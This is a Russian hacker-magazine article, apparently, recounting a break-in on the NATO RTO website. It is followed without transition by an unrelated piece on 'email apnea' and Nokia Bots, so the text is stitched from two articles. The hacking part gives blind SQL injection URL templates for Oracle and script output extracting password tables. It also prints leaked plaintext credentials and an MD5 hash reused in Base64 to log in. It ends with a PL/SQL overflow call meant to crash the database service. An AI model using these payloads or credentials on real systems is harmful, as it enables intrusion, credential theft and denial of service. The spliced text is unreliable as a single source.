Слепая инъекция, конечно, потребовала от нас некоторых усилий по автоматизации процесса. Благо, бабушкинаподшивка журнала Хакер за прошлый год помогла – в ней оказалось все, что нужно для создания скриптов на Perl. Мы даже смогли быстро составить два запроса – один определяет длины строки, которую мы хотим «вытащить» из базы данных, а второй вытаскивает один символ из этой строки:

а) запрос для получения длины строки:

http://www.rto.nato.int/Detail.asp?ID=-1+OR+(select+length(table_name)+ from+user_tables+where+’%ЗДЕСЬ УСЛОВИЕ ЗАПРОСА%’+AND+rownum=1)=%ЗДЕСЬ ДЛИНА, КОТОРУЮ ПРОВЕРЯЕМ%

б) запрос для получения строки (здесь конкретно – имени столбца в указанной таблице):

http://www.rto.nato.int/Detail.asp?ID=-1+OR+(select+substr(column_name,%ЗДЕСЬ ПОЗИЦИЯ СИМВОЛА В ИМЕНИ СТОЛБЦА%,1)+from+all_tab_columns+where+table_name=’.%ЗДЕСЬ ИМЯ ТАБЛИЦЫ%.’+AND+’%ЗДЕСЬ УСЛОВИЕ ЗАПРОСА%’+AND+rownum=1)=chr(%НОМЕР СИМВОЛА%)

Для того, чтобы получить только первую строку с данными из всего запроса, мы воспользовались ключевым словом rownum диалекта SQL-базы данных Oracle, с помощью которого можно определять условие над уже собранным набором строк с выходными данными. Использование всевозможных технологий ускорения «слепого» перебора оставляем для тренировки . Есть, правда, один очень большой минус – это количество таблиц (в том числе служебных) в базах Oracle. Вслепую вытаскивать всю схему таблиц – титанический труд, поэтому мы интересовались только таблицами, в названии которых есть магическое слово «PASSWORD». На рисунке приведена схема c наиболее интересными таблицами и столбцами. На диске к журналу ты найдешь скрипты, которыми можно пополнить эту схему .

Среди довольно большого набора таблиц наиболее интересными кажутся вот эти:

RTO_MEMBERS.MEMBER_PASSWORD
RTO_PANEL.PANEL_PASSWORD
USER_DB_LINKS.PASSWORD
CONTACTLOGIN.CLO_PASSWORD
APPLICATIONLOGIN.PASSWORD
CONTACT.CLO_PASSWORD

Значения данных, которые в них хранятся, впечатляют не меньше, чем операция «Анаконда» коалиционных войск в Афганистане.

USERNAME: RTAMASTER
PASSWORD: droopy
DB_LINK: TEST.RTA.INT

USERNAME: WISE
PASSWORD: BUGSBUNNY
DB_LINK: WISE_LINK

Впрочем, хранить пароли в открытом виде свойственно многим большим умам. Кроме того, нас больше интересуют пароли, которые можно использовать для входа в закрытую часть сайта. Используем древнегреческое знание о двоичном поиске и запустим наш скрипт слепого перебора:

DB Scanning table rto_panel
..........[DBG: FOUND NUMBER 29.]
DB NUMBER OF ROWS FOUND: 29
Getting row 1
DB getting panel_webname
.......[DBG: FOUND NUMBER 1.]
.........[DBG: FOUND SYMBOL ' ' - 32]
DB
DB getting panel_password
.......[DBG: FOUND NUMBER 16.]
........[DBG: FOUND SYMBOL 'х' - 245]
........[DBG: FOUND SYMBOL 'ї' - 191]
. . .
.........[DBG: FOUND SYMBOL '$' - 36]
.........[DBG: FOUND SYMBOL 'Ё' - 168]
DB хїЙ)z <Ж!Д*Аt¤$Ё
DB 245|191|201|41|122|24|60|198|33|196|42|192|116|164|36|168|
DB getting panel_number
.......[DBG: FOUND NUMBER 7.]
.........[DBG: FOUND SYMBOL 'R' - 82]
. . .
........[DBG: FOUND SYMBOL 'A' - 65]
DB RTA-CSA
DB getting panel_alias
.......[DBG: FOUND NUMBER 7.]
. . .
........[DBG: FOUND SYMBOL 'A' - 65]
DB RTA-CSA

Важными столбцами из листинга для нас являются «panel_webname» и «panel_password», последний хранит MD5 хэши паролей. Получаем все хэши и ставим их на брут. Как правило, на этом заканчиваются все стандартные взломы, но мы пойдем дальше.

Проверка на дорогах

Доступ к закрытым зонам веб-сайта можно получить, если авторизоваться паролем любого участника или сотрудника RTO. Для аутентификации была использована технология «SINGLE SIGN-ON», которая позволяет использовать любые другие пароли от аналогичных хранилищ информации:

Please authenticate to access website protected areas and the RTO collaborative environment. Use your RTO collaborative environment credentials or the RTO generic credentials to log on.

Понятие «единого входа», о котором талдычат НАТОвские программеры, изначально предполагает, что в разных местах пользователь может использовать один выданный ему логин/пароль. Здесь же это понятие сводится к тому, что в одном месте (на сайте) можно использовать пароли от нескольких других мест. Таким образом, общая безопасность находится на уровне самого слабого сайта, пароли от которого могут быть введены в RTO.NATO.INT.

Раз уж пароли используют чуть ли не из мусорного бака, не стоит ли нам повнимательнее посмотреть, как они передаются на сервер? Тут начинается самое интересное. Оказывается, поля пользовательского ввода логина и пароля перед отправкой обрабатываются с помощью JavaScript-функции. Для того, чтобы это чудо инженерной мысли случилось, к основному HTML подключен файл md5.js, который представляет собой ничто иное как реализацию алгоритма MD5 компанией RSA Data Security (они, кстати, являются основными защитниками информации для НАТОвских ресурсов). В конце этого файла есть замечательная функция «pw2md5(in_pw, out_md5)», которая и вызывается при отправке логина и пароля обратно на сайт:

<form action="checkident.asp" method="post" name="frmlogon" onSubmit="return sendData();">
. . .
. . .
function sendData()
{
var FORM = document.frmlogon;

pw2md5(FORM.MemberMatkhau,FORM.MemberMatkhau);
return true;
}

Теперь посмотрим на саму функцию pw2md5(). Она принимает на вход пароль в чистом виде, вычисляет MD5 от него, конвертирует полученное бинарное 16-байтовое значение в BASE64 представление и записывает в выходной параметр.

md5.js:
/*
* A JavaScript implementation of the RSA Data Security, Inc. MD5 Message
* Digest Algorithm, as defined in RFC 1321.
* Version 2.1 Copyright (C) Paul Johnston 1999 - 2002.
* Other contributors: Greg Holt, Andrew Kepert, Ydnar, Lostinet
* Distributed under the BSD License
* See http://pajhome.org.uk/crypt/md5 for more info.
*/
. . .
. . .
/*
* Util method added by minhnn
*/
function pw2md5(password, md5password) {
md5password.value = b64_md5(password.value) + "==";
// password.value = "";
}

Такой изумительный карточный расклад означает, что нам НЕ НУЖНО взламывать хэши MD5! Вместо этого мы можем просто подставить значение из базы данных прямо в форму отправки! Для этого воспользуемся онлайн-трансформером BASE64, предварительно сделав бинарный файл с байтами MD5 хэша одного из пользователей.

Используя motobit.com, получаем следующие данные:

USERNAME: IST
PASSWORD: AD2F38AEE7B3162D832624DA76983CD2
BASE64: rS84ruezFi2DJiTadpg80g==

Дальше нам очень пригодится веб-браузер Mozilla Firefox и его компонент TamperData, чтобы подставить налету в POST-запрос вместо обычных MD5 свои, честно подсмотренные в базе данных. Это довольно тривиальный процесс, посмотреть на примеры можно в документации на компонент TamperData… Подставляем, проверяем, давим кнопку «Послать»… и, как говорится в анекдоте, «детей не люблю, но… сам процесс!». Итак, мы внутри!

Солдат, выйти из строя!

Все бы ничего, если бы нас не жгла мысль о том, что слепой SQL – это ничто иное, как консоль к базе данных. Ведь с СУБД Oracle можно творить такое, что никакому SQLite и MySQL и не снилось (здесь мы улыбаемся и машем Александру Полякову, автору книги «Безопасность Oracle глазами аудитора», а также iDefense Labs, – не знаю, кто был первый в обнаружении этой уязвимости). Наш уважаемый коллега описывает, как можно использовать доступ к процедуре XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA, доступной на выполнение любому пользователю базы данных. Используя эту уязвимость в 10g можно вызвать переполнение буфера, и служба Oracle аварийно завершит свою работу. Так что, как только нам надоест баловаться с доступом к закрытым секциям сайта, мы делаем следующее:

declare
a varchar2(32767);
b varchar2(32767);
begin
a:='XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX';
b:='YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY';
a:=a||a; a:=a||a; a:=a||a; a:=a||a; a:=a||a; a:=a||a;
b:=b||b; b:=b||b; b:=b||b; b:=b||b; b:=b||b; b:=b||b;
XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA(a, b);
end;

После того, как мы запишем этот вызов в одну длинную строку запроса и вставим на место нашей слепой инъекции, мы сможем увидеть вот такую картинку.

Конец света

Разговоры про сетецентрические войны и ведение информационной войны – это, конечно, хорошо. Однако опыт показывает, что просто разговоров мало – уж если мы анализируем сайты наших НАТОвских «союзников», то и они, наверное, от нас не отстают. На этом фоне очень огорчает наличие аналогичных проблем с безопасностью на наших отечественных государственных сайтах. Вот, например, на сайте Федеральной службы технического и экспортного контроля (которая со следующего года будет защищать наши персональные данные), присутствуют все те же «мелкие» проблемы.

Да чего уж, если порно-ролики на дорожных биллбордах Садового кольца хакеры крутят . Но, все-таки, хотя бы законодатели в области информационной безопасности должны относиться к своим ресурсам ответственно. Иначе на кого же мы будем равняться?

Для чувства мгновенной паники в момент всплывающего уведомления о получении нового почтового сообщения уже придумали научное название: электронно-почтовая асфиксия. Если верить Линде Стоун, бывшему психологу компании Microsoft, придумавшей этот термин, электронно-почтовая асфиксия проявляется в момент получения нового письма и связана с секундным нарушением дыхательного процесса. Человек находится в постоянном напряжении, ссутулившись перед экраном компьютера, не способный сконцентрироваться на других делах, пока не разберется с наплывом просмотренной электронной почты.

Стоун беспокоит еще одна проблема поколения, которое «всегда на связи», – постоянное расслоение внимания. Симптомы расслоения внимания проявляются в момент методичного перебора телевизионных каналов или просмотра нескольких веб-страниц одновременно.

В определенной степени это способ эмоционального возбуждения для молодежи. Культура постоянной доступности, в конце концов, еще только зарождается. Сервисы Google едва вступили в пору отрочества, а Facebook – вовсе шестилетний малыш. Умные люди уже придумали несколько вариантов решения. Nokia Beta Labs выпустила приложение Nokia Bots. Программа призвана сгладить вечно рваный из-за постоянного притока электронной почты дневной график работы. По сути, речь идет о личном секретаре, который фильтрует поступающую вам информацию. «Ваше устройство научится предугадывать ваши желания и скрывать информацию, которая, по его мнению, вас не заинтересует», – говорит Арии Турунен, один из разработчиков приложения Nokia Bots.

В итоге, вместо того, чтобы каждый день заводить будильник, Nokia Bots отслеживает ваш обычный распорядок дня (скажем, тот факт, что подъем у вас назначен за два часа до первой деловой встречи) и устанавливает будильник самостоятельно. А за десять минут до начала совещания автоматически переводит смартфон в режим «без звука». Для некоторых подобные инновации окажутся чересчур серьезным шагом, а многие вовсе предпочтут полностью отключаться от цифрового мира на какое-то время. Забудьте о знаменитой фразе доктора Лири, ставшей девизом сторонников психотропных веществ: «Включись, настройся, отпади». Новым лозунгом для разочаровавшихся в гаджетах техноборцев станет «Отключи и отключись».

Писатель из Нью-Йорка Винифред Галлахер приложил немало усилий, лишь бы избавиться от электронно-почтовой асфиксии, перебравшись в лишенный даже признаков новейших технологий дом с работающей на дровах печкой.

«Когда в доме градусник показывает плюс 15, единственной заботой остается проблема согревания, – сказал Галлахер в интервью New York Times. – Концентрация на выживании лежит в основе философии дзен, способствующей очищению сознания».

Но нам ближе подход к существованию в стиле технодзен, провозглашенный художником Нако Карбонеллом. В чем соль такого времяпрепровождения? «Сидеть в кустах, – ухмыльнулся он, – с полным игрушек ноутбуком».